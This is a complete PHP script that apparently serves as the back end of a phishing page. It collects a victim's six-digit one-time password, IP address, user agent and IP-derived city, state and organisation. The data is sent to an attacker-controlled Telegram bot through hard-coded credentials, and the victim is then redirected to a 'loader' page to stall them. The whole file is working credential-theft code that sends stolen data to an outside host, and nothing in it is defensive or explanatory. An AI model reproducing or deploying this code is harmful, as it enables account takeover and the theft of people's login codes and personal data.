<?php

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['a'], $_POST['b'], $_POST['c'], $_POST['d'], $_POST['e'], $_POST['f'])) {
        // Collect OTP digits
        $otp1 = htmlspecialchars($_POST['a']);
        $otp2 = htmlspecialchars($_POST['b']);
        $otp3 = htmlspecialchars($_POST['c']);
        $otp4 = htmlspecialchars($_POST['d']);
        $otp5 = htmlspecialchars($_POST['e']);
        $otp6 = htmlspecialchars($_POST['f']);

        // Collect other information (IP, city, state, etc.)
        $ip = $_SERVER['REMOTE_ADDR']; // Get IP address
        $user_agent = $_SERVER['HTTP_USER_AGENT']; // Get user agent

        // Get location info using a third-party IP API (you can use ip-api or any other API)
        $location_data = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
        $city = isset($location_data->city) ? $location_data->city : 'N/A';
        $state = isset($location_data->regionName) ? $location_data->regionName : 'N/A';
        $organization = isset($location_data->org) ? $location_data->org : 'N/A';

        // Prepare the message to send to Telegram
        $message = "OTP: $otp1$otp2$otp3$otp4$otp5$otp6\n";
        $message .= "IP Address: $ip\n";
        $message .= "City: $city\n";
        $message .= "State: $state\n";
        $message .= "Organization: $organization\n";
        $message .= "User-Agent: $user_agent";

        // Send the message to Telegram
        sendToTelegram($message);

        // Redirect to loader page
        header('Location: ../loader.html');
        exit();
    }
}

// Function to send the data to Telegram
function sendToTelegram($message) {
     $bot_token = '7761610400:AAEIPtxg0NL0xrWdlHFhvn1z53ASqDv_EYg';  // Replace with your Telegram Bot Token
    $chat_id = '6265235194';      // Replace with your Telegram Chat ID
    $telegram_api_url = "https://api.telegram.org/bot$bot_token/sendMessage";

    // Prepare the data
    $data = [
        'chat_id' => $chat_id,
        'text' => $message
    ];

    // Send message via cURL
    $ch = curl_init($telegram_api_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}
?>
